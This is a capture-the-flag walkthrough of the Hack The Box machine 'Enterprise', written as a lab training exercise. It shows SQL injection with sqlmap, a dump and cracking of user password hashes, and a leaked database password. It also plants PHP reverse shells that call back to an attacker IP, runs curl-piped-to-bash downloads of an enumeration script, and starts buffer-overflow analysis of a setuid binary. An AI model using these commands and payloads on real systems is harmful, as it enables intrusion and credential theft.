Database: joomladb Table: edz2g_menu [24 columns] +-------------------+---------------------+ | Column | Type | +-------------------+---------------------+ | access | int(10) unsigned | | id | int(11) | | language | char(7) | | level | int(10) unsigned | | link | varchar(1024) | | path | varchar(1024) | | type | varchar(16) | | alias | varchar(400) | | browserNav | tinyint(4) | | checked_out | int(10) unsigned | | checked_out_time | datetime | | client_id | tinyint(4) | | component_id | int(10) unsigned | | home | tinyint(3) unsigned | | img | varchar(255) | | lft | int(11) | | menutype | varchar(24) | | note | varchar(255) | | params | text | | parent_id | int(10) unsigned | | published | tinyint(4) | | rgt | int(11) | | template_style_id | int(10) unsigned | | title | varchar(255) | +-------------------+---------------------+
Database: joomladb Table: edz2g_languages [14 columns] +--------------+------------------+ | Column | Type | +--------------+------------------+ | access | int(10) unsigned | | ordering | int(11) | | asset_id | int(10) unsigned | | description | varchar(512) | | image | varchar(50) | | lang_code | char(7) | | lang_id | int(11) unsigned | | metadesc | text | | metakey | text | | published | int(11) | | sef | varchar(50) | | sitename | varchar(1024) | | title | varchar(50) | | title_native | varchar(50) | +--------------+------------------+
Database: joomladb Table: edz2g_content_frontpage [2 columns] +------------+---------+ | Column | Type | +------------+---------+ | ordering | int(11) | | content_id | int(11) | +------------+---------+
Database: joomladb Table: edz2g_banner_tracks [4 columns] +------------+------------------+ | Column | Type | +------------+------------------+ | count | int(10) unsigned | | banner_id | int(10) unsigned | | track_date | datetime | | track_type | int(10) unsigned | +------------+------------------+
Database: joomladb Table: edz2g_viewlevels [4 columns] +----------+------------------+ | Column | Type | +----------+------------------+ | id | int(10) unsigned | | ordering | int(11) | | rules | varchar(5120) | | title | varchar(100) | +----------+------------------+
Database: joomladb Table: edz2g_associations [3 columns] +---------+-------------+ | Column | Type | +---------+-------------+ | id | int(11) | | key | char(32) | | context | varchar(50) | +---------+-------------+
Database: joomladb Table: edz2g_utf8_conversion [1 column] +-----------+------------+ | Column | Type | +-----------+------------+ | converted | tinyint(4) | +-----------+------------+
Database: joomladb Table: edz2g_finder_taxonomy_map [2 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | node_id | int(10) unsigned | +---------+------------------+
Database: joomladb Table: edz2g_ucm_content [32 columns] +--------------------------+---------------------+ | Column | Type | +--------------------------+---------------------+ | asset_id | int(10) unsigned | | core_access | int(10) unsigned | | core_alias | varchar(400) | | core_body | mediumtext | | core_catid | int(10) unsigned | | core_checked_out_time | varchar(255) | | core_checked_out_user_id | int(10) unsigned | | core_content_id | int(10) unsigned | | core_content_item_id | int(10) unsigned | | core_created_by_alias | varchar(255) | | core_created_time | datetime | | core_created_user_id | int(10) unsigned | | core_featured | tinyint(4) unsigned | | core_hits | int(10) unsigned | | core_images | text | | core_language | char(7) | | core_metadata | varchar(2048) | | core_metadesc | text | | core_metakey | text | | core_modified_time | datetime | | core_modified_user_id | int(10) unsigned | | core_ordering | int(11) | | core_params | text | | core_publish_down | datetime | | core_publish_up | datetime | | core_state | tinyint(1) | | core_title | varchar(400) | | core_type_alias | varchar(400) | | core_type_id | int(10) unsigned | | core_urls | text | | core_version | int(10) unsigned | | core_xreference | varchar(50) | +--------------------------+---------------------+
Database: joomladb Table: edz2g_ucm_base [4 columns] +-----------------+------------------+ | Column | Type | +-----------------+------------------+ | ucm_id | int(10) unsigned | | ucm_item_id | int(10) | | ucm_language_id | int(11) | | ucm_type_id | int(11) | +-----------------+------------------+
Database: joomladb Table: edz2g_user_usergroup_map [2 columns] +----------+------------------+ | Column | Type | +----------+------------------+ | group_id | int(10) unsigned | | user_id | int(10) unsigned | +----------+------------------+
Database: joomladb Table: edz2g_categories [27 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | access | int(10) unsigned | | extension | varchar(50) | | id | int(11) | | language | char(7) | | level | int(10) unsigned | | path | varchar(400) | | version | int(10) unsigned | | alias | varchar(400) | | asset_id | int(10) unsigned | | checked_out | int(11) unsigned | | checked_out_time | datetime | | created_time | datetime | | created_user_id | int(10) unsigned | | description | mediumtext | | hits | int(10) unsigned | | lft | int(11) | | metadata | varchar(2048) | | metadesc | varchar(1024) | | metakey | varchar(1024) | | modified_time | datetime | | modified_user_id | int(10) unsigned | | note | varchar(255) | | params | text | | parent_id | int(10) unsigned | | published | tinyint(1) | | rgt | int(11) | | title | varchar(255) | +------------------+------------------+
Database: joomladb Table: edz2g_finder_links_terms7 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_termsd [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_contentitem_tag_map [6 columns] +-----------------+------------------+ | Column | Type | +-----------------+------------------+ | content_item_id | int(11) | | core_content_id | int(10) unsigned | | tag_date | timestamp | | tag_id | int(10) unsigned | | type_alias | varchar(255) | | type_id | mediumint(8) | +-----------------+------------------+
Database: joomladb Table: edz2g_template_styles [6 columns] +-----------+---------------------+ | Column | Type | +-----------+---------------------+ | id | int(10) unsigned | | template | varchar(50) | | client_id | tinyint(1) unsigned | | home | char(7) | | params | text | | title | varchar(255) | +-----------+---------------------+
Database: joomladb Table: edz2g_finder_links_terms2 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_terms8 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_terms1 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_finder_links_terms3 [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_modules_menu [2 columns] +----------+---------+ | Column | Type | +----------+---------+ | menuid | int(11) | | moduleid | int(11) | +----------+---------+
Database: joomladb Table: edz2g_finder_links_termsf [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
Database: joomladb Table: edz2g_usergroups [5 columns] +-----------+------------------+ | Column | Type | +-----------+------------------+ | id | int(10) unsigned | | lft | int(11) | | parent_id | int(10) unsigned | | rgt | int(11) | | title | varchar(100) | +-----------+------------------+
Database: joomladb Table: edz2g_session [7 columns] +------------+---------------------+ | Column | Type | +------------+---------------------+ | data | mediumtext | | time | varchar(14) | | client_id | tinyint(3) unsigned | | guest | tinyint(4) unsigned | | session_id | varchar(191) | | userid | int(11) | | username | varchar(150) | +------------+---------------------+
Database: joomladb Table: edz2g_finder_terms_common [2 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | language | varchar(3) | | term | varchar(75) | +----------+-------------+
Database: joomladb Table: edz2g_update_sites_extensions [2 columns] +----------------+---------+ | Column | Type | +----------------+---------+ | extension_id | int(11) | | update_site_id | int(11) | +----------------+---------+
Database: joomladb Table: edz2g_finder_links_termsc [3 columns] +---------+------------------+ | Column | Type | +---------+------------------+ | link_id | int(10) unsigned | | term_id | int(10) unsigned | | weight | float unsigned | +---------+------------------+
[13:26:50] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/ou tput/enterprise.htb'
[*] ending @ 13:26:50 /2020-05-25/
Joomla Users
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req --dump -D joomladb -T edz2g_users -C id,email,username,password
___
__H__
___ ___[(]_____ ___ ___ {1.4.5#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:30:07 /2020-05-25/
[14:30:07] [INFO] parsing HTTP request from 'lcars_db.req'
[14:30:07] [INFO] resuming back-end DBMS 'mysql'
[14:30:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: query=(SELECT 3596 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3596=3596,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[14:30:09] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[14:30:09] [INFO] fetching entries of column(s) '`id`, `password`, email, username' for table 'edz2g_users' in database 'joomladb'
[14:30:09] [INFO] resumed: '400'
[14:30:09] [INFO] resumed: '$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy'
[14:30:09] [INFO] resumed: 'geordi.la.forge@enterprise.htb'
[14:30:09] [INFO] resumed: 'geordi.la.forge'
[14:30:09] [INFO] resumed: '401'
[14:30:09] [INFO] resumed: '$2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q'
[14:30:09] [INFO] resumed: 'guinan@enterprise.htb'
[14:30:09] [INFO] resumed: 'Guinan'
Database: joomladb
Table: edz2g_users
[2 entries]
+------+--------------------------------------------------------------+--------------------------------+-----------------+
| id | password | email | username |
+------+--------------------------------------------------------------+--------------------------------+-----------------+
| 400 | $2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy | geordi.la.forge@enterprise.htb | geordi.la.forge |
| 401 | $2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q | guinan@enterprise.htb | Guinan |
+------+--------------------------------------------------------------+--------------------------------+-----------------+
[14:30:09] [INFO] table 'joomladb.edz2g_users' dumped to CSV file '/home/u505/.sqlmap/output/enterprise.htb/dump/joomladb/edz2g_users.csv'
[14:30:09] [INFO] fetched data logged to text files under '/home/u505/.sqlmap/output/enterprise.htb'
[*] ending @ 14:30:09 /2020-05-25/
We brute force the users.
u505@kali:~/HTB/Machines/Enterprise$ cat joomla.hash geordi.la.forge:$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy Guinan:$2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q u505@kali:~/HTB/Machines/Enterprise$ hashid '$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy' Analyzing '$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy' [+] Blowfish(OpenBSD) [+] Woltlab Burning Board 4.x [+] bcrypt u505@kali:~/HTB/Machines/Enterprise$ hashcat -m 3200 --username joomla.hash pass.txt ... u505@kali:~/HTB/Machines/Enterprise$ hashcat -m 3200 --username joomla.hash pass.txt --show geordi.la.forge:$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy:ZD3YxfnSjezg67JZ Guinan:$2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q:ZxJyhGem4k338S2Y
Wordpress Reverse shell
On the page 404.php, we add our reverse shell.
u505@kali:~/HTB/Machines/Enterprise$ cp /usr/share/webshells/php/php-reverse-shell.php ./ u505@kali:~/HTB/Machines/Enterprise$ grep CHANGE php-reverse-shell.php $ip = '10.10.14.16'; // CHANGE THIS $port = 4444; // CHANGE THIS
Open listener.
u505@kali:~/HTB/Machines/Enterprise$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Call of an unknown page calls the page 404.php.
u505@kali:~/HTB/Machines/Enterprise$ curl http://enterprise.htb/?p=505
And open the reverse shell.
u505@kali:~/HTB/Machines/Enterprise$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.61. Ncat: Connection from 10.10.10.61:37296. Linux b8319d86d21e 4.10.0-37-generic #41-Ubuntu SMP Fri Oct 6 20:20:37 UTC 2017 x86_64 GNU/Linux 19:22:37 up 4:47, 0 users, load average: 0.08, 0.02, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" /bin/sh: 1: python: not found $ python3 -c "import pty;pty.spawn('/bin/bash')" /bin/sh: 2: python3: not found $ /bin/bash -i bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell
Looking for user flag, ...
www-data@b8319d86d21e:/home$ cat user.txt cat user.txt As you take a look around at your surroundings you realise there is something wrong. This is not the Enterprise! As you try to interact with a console it dawns on you. Your in the Holodeck!
We are inside a linux container.
www-data@b8319d86d21e:/var/www/html$ grep DB wp-config.php
grep DB wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'NCC-1701E');
define('DB_HOST', 'mysql');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', );
The database host seems to be another container.
www-data@b8319d86d21e:/var$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 mysql 15af95635b7d
172.17.0.4 b8319d86d21e
We also fin an interesting php file.
www-data@b8319d86d21e:/var/www/html$ head sqlShell.php head sqlShell.php <?php
//Me mashing my keyboard, aka uncrackable password. //Don't want to accidentally leave this lying around unsecure. $password = 'NCC-1701E';
session_start();
if ( isset( $_POST['clear'] ) AND $_POST['clear'] == 'clear' ) { clear_history();
This php page allows us to query the database.
We already have query the database with Sqlmap, but this way could be more comfortable.
Joomla reverse shell
Turn on the listener.
u505@kali:~/HTB/Machines/Enterprise$ rlwrap nc -lnvp 4445 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445
u505@kali:~/HTB/Machines/Enterprise$ rlwrap nc -lnvp 4445 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445 Ncat: Connection from 10.10.10.61. Ncat: Connection from 10.10.10.61:46530. Linux a7018bfdc454 4.10.0-37-generic #41-Ubuntu SMP Fri Oct 6 20:20:37 UTC 2017 x86_64 GNU/Linux 19:56:22 up 5:21, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ bash -i bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell
Again, we are inside a linux container.
www-data@a7018bfdc454:/var/www/html$ mount -l
mount -l
none on / type aufs (rw,relatime,si=dd348e9525d0350e,dio,dirperm1)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,relatime,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (ro,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
cgroup on /sys/fs/cgroup/blkio type cgroup (ro,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (ro,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/pids type cgroup (ro,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (ro,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/memory type cgroup (ro,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/perf_event type cgroup (ro,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/freezer type cgroup (ro,nosuid,nodev,noexec,relatime,freezer)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/mapper/enterprise--vg-root on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /var/www/html type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /var/www/html/files type ext4 (rw,relatime,errors=remount-ro,data=ordered)
proc on /proc/bus type proc (ro,relatime)
proc on /proc/fs type proc (ro,relatime)
proc on /proc/irq type proc (ro,relatime)
proc on /proc/sys type proc (ro,relatime)
proc on /proc/sysrq-trigger type proc (ro,relatime)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/timer_stats type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/sched_debug type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /sys/firmware type tmpfs (ro,relatime)
We didn't find anything interesting except the /var/www/html/files. This folder is mounted on the host file system.
www-data@a7018bfdc454:/var/www/html/files$ ls -ltr ls -ltr total 4 -rw-r--r-- 1 root root 1406 Oct 17 2017 lcars.zip
But the file is known.
If we add a file to folder, is added to the host web server too.
www-data@a7018bfdc454:/var/www/html/files$ echo "<?php phpinfo(); ?>" > u505.php <www/html/files$ echo "<?php phpinfo(); ?>" > u505.php
And the file is interpreted by the host.
Host reverse shell
u505@kali:~$ rlwrap nc -lnvp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446
We create the reverse shell file.
u505@kali:~/HTB/Machines/Enterprise$ mkdir www u505@kali:~/HTB/Machines/Enterprise$ cp php-reverse-shell.php www u505@kali:~/HTB/Machines/Enterprise$ cd www/ u505@kali:~/HTB/Machines/Enterprise/www$ mv php-reverse-shell.php reverse.php u505@kali:~/HTB/Machines/Enterprise/www$ vi reverse.php u505@kali:~/HTB/Machines/Enterprise/www$ grep CHANGE reverse.php $ip = '10.10.14.16'; // CHANGE THIS $port = 4446; // CHANGE THIS u505@kali:~/HTB/Machines/Enterprise/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the joomla reverse shell, we doanload the file.
www-data@a7018bfdc454:/var/www/html/files$ wget http://10.10.14.16/reverse.php <www/html/files$ wget http://10.10.14.16/reverse.php bash: wget: command not found www-data@a7018bfdc454:/var/www/html/files$ curl http://10.10.14.16/reverse.php -o reverse.php <www/html/files$ curl http://10.10.14.16/reverse.php -o reverse.php % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 5493 100 5493 0 0 71842 0 --:--:-- --:--:-- --:--:-- 72276
We call the reverse shell.
u505@kali:~/HTB/Machines/Enterprise/www$ curl -k https://enterprise.local/files/reverse.php
And our listener responds
u505@kali:~$ rlwrap nc -lnvp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446 Ncat: Connection from 10.10.10.61. Ncat: Connection from 10.10.10.61:48908. Linux enterprise.htb 4.10.0-37-generic #41-Ubuntu SMP Fri Oct 6 20:20:37 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 02:46:01 up 4:38, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" /bin/sh: 1: python: not found $ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@enterprise:/$ stty raw -echo stty raw -echo [1]+ Stopped rlwrap nc -lnvp 4446 u505@kali:~$ stty speed 38400 baud; line = 0; -brkint -imaxbel iutf8 u505@kali:~$ stty -a speed 38400 baud; rows 67; columns 237; line = 0; intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0; -parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc u505@kali:~$ fg rlwrap nc -lnvp 4446 www-data@enterprise:/$ stty rows 67 columns 237
User flag
From user www-data, we are able to read the user flag.
www-data@enterprise:/$ ls -l /home/jeanlucpicard/user.txt -r--r--r-- 1 jeanlucpicard jeanlucpicard 33 Sep 8 2017 /home/jeanlucpicard/user.txt www-data@enterprise:/$ cat /home/jeanlucpicard/user.txt <USER_FLAG>
Privileges escalation
www-data@enterprise:/$ curl http://10.10.14.16/LinEnum.sh | bash ... [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:32812 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::5355 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::8080 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::443 :::* LISTEN - ... [-] Contents of /etc/xinetd.conf: # Simple configuration file for xinetd # # Some defaults, and include /etc/xinetd.d/
defaults {
# Please note that you need a log_type line to be able to use log_on_success # and log_on_failure. The default is the following : # log_type = SYSLOG daemon info
}
includedir /etc/xinetd.d
[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below: total 32 drwxr-xr-x 2 root root 4096 Sep 9 2017 . drwxr-xr-x 95 root root 4096 May 21 22:21 .. -rw-r--r-- 1 root root 640 Nov 3 2016 chargen -rw-r--r-- 1 root root 502 Nov 3 2016 daytime -rw-r--r-- 1 root root 391 Nov 3 2016 discard -rw-r--r-- 1 root root 422 Nov 3 2016 echo -rw-r--r-- 1 root root 154 Sep 9 2017 lcars -rw-r--r-- 1 root root 569 Nov 3 2016 time ... [-] SUID files: ... -rwsr-xr-x 1 root root 38984 May 18 2017 /bin/mount -rwsr-xr-x 1 root root 12152 Sep 8 2017 /bin/lcars -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
And, if we take a look at /etc/xinetd.d/lcars config file.
www-data@enterprise:/$ cat /etc/xinetd.d/lcars
service lcars
{
type = UNLISTED
protocol = tcp
socket_type = stream
port = 32812
wait = no
server = /bin/lcars
user = root
}
xinetd runs as root.
www-data@enterprise:/$ ps -ef | grep xinet
root 1619 1 0 May21 ? 00:00:00 /usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
www-data 56652 56541 0 03:35 pts/1 00:00:00 grep xinet
ASLR is disabled on the target.
www-data@enterprise:/etc/xinetd.d$ cat /proc/sys/kernel/randomize_va_space 0 www-data@enterprise:/etc/xinetd.d$ ldd /bin/lcars linux-gate.so.1 => (0xf7ffc000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7e32000) /lib/ld-linux.so.2 (0x56555000) www-data@enterprise:/etc/xinetd.d$ ldd /bin/lcars linux-gate.so.1 => (0xf7ffc000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7e32000) /lib/ld-linux.so.2 (0x56555000)
Program analysis
www-data@enterprise:/$ scp /bin/lcars u505@10.10.14.16:/home/u505/HTB/Machines/Enterprise/lcarsprg Could not create directory '/var/www/.ssh'. The authenticity of host '10.10.14.16 (10.10.14.16)' can't be established. ECDSA key fingerprint is SHA256:ul2yK4MycGHJVeGXwtf6Uts1TELbRlDwqXUxP/9K9m4. Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts). u505@10.10.14.16's password: lcars 100% 12KB 299.8KB/s 00:00
Decompilation:
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
undefined4 main(undefined1 param_1)
{ char local_19 [9]; undefined1 *local_10; local_10 = ¶m_1; setresuid(0,0,0); startScreen(); puts("Enter Bridge Access Code: "); fflush(stdout); fgets(local_19,9,stdin); bridgeAuth(local_19); return 0; }
The main function calls startScreen and bridgeAuth.
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
void startScreen(void)
{ puts(""); puts(" _______ _______ ______ _______"); puts(" | | |_____| |_____/ |______"); puts(" |_____ |_____ | | | \\_ ______|"); puts(""); puts("Welcome to the Library Computer Access and Retrieval System\n"); return; }
The function startScreen shows a banner.
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
void bridgeAuth(char *param_1)
{ char local_32; undefined uStack49; undefined uStack48; undefined uStack47; undefined uStack46; undefined uStack45; undefined uStack44; undefined uStack43; undefined uStack42; int local_14; undefined4 local_10; local_32 = 'p'; uStack49 = 0x69; uStack48 = 99; uStack47 = 0x61; uStack46 = 0x72; uStack45 = 100; uStack44 = 0x61; uStack43 = 0x31; local_10 = 9; uStack42 = 0; local_14 = strcmp(param_1,&local_32); if (local_14 == 0) { main_menu(); } else { puts("\nInvalid Code\nTerminating Console\n"); } fflush(stdout); /* WARNING: Subroutine does not return */ exit(0); }
If the input code is correct, the main menu is showed.
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
void main_menu(void)
{ uint local_d8 [52]; local_d8[0] = 0; startScreen(); puts("\n"); puts("LCARS Bridge Secondary Controls -- Main Menu: \n"); puts("1. Navigation"); puts("2. Ships Log"); puts("3. Science"); puts("4. Security"); puts("5. StellaCartography"); puts("6. Engineering"); puts("7. Exit"); puts("Waiting for input: "); fflush(stdout); __isoc99_scanf(&DAT_00010f92,local_d8); if (local_d8[0] < 8) { /* WARNING: Could not recover jumptable at 0x0001097e. Too many branches */ /* WARNING: Treating indirect jump as call */ (*(code *)((int)&_GLOBAL_OFFSET_TABLE_ + *(int *)(&DAT_000110c4 + local_d8[0] * 4)))(); return; } unable(); return; }
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
The decompiler is not able to follow the program stream, but there are only two more functions.
void unable(void)
{ puts("\nSecondary Routines not implemented\nTerminating Console\n"); fflush(stdout); return; }
This function doesnn't do anything.
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
void disableForcefields(void)
{ undefined local_d4 [204]; startScreen(); puts("Disable Security Force Fields"); puts("Enter Security Override:"); fflush(stdout); __isoc99_scanf(&DAT_00010ec4,local_d4); printf("Rerouting Tertiary EPS Junctions: %s",local_d4); return; }
The likelihood of a buffer overflow in this function is very high because the variable has a length of 204 and no validation is done before scanf, and we print the value from the possibly overflowed variable.
Find the access code
We run the program with the libraries calls traced.
u505@kali:~/HTB/Machines/Enterprise$ ltrace ./lcarsprg
__libc_start_main(0x565aec91, 1, 0xff881854, 0x565aed30 <unfinished ...>
setresuid(0, 0, 0, 0x565aeca8) = 0xffffffff
puts(""
) = 1
puts(" _______ _______"... _______ _______ ______ _______
) = 49
puts(" | | |_____|"... | | |_____| |_____/ |______
) = 49
puts(" |_____ |_____ | |"... |_____ |_____ | | | \_ ______|
) = 49
puts(""
) = 1
puts("Welcome to the Library Computer "...Welcome to the Library Computer Access and Retrieval System
) = 61
puts("Enter Bridge Access Code: "Enter Bridge Access Code:
) = 27
fflush(0xf7eefd20) = 0
fgets(123456789
"12345678", 9, 0xf7eef580) = 0xff881797
strcmp("12345678", "picarda1") = -1
puts("\nInvalid Code\nTerminating Consol"...
Invalid Code
Terminating Console
) = 35
fflush(0xf7eefd20) = 0
exit(0 <no return ...>
+++ exited (status 0) +++
The access code is picarda1
Disable ASLR locally
The target machine has the ASLR disabled, so we disabled it on our machine to be on similar conditions.
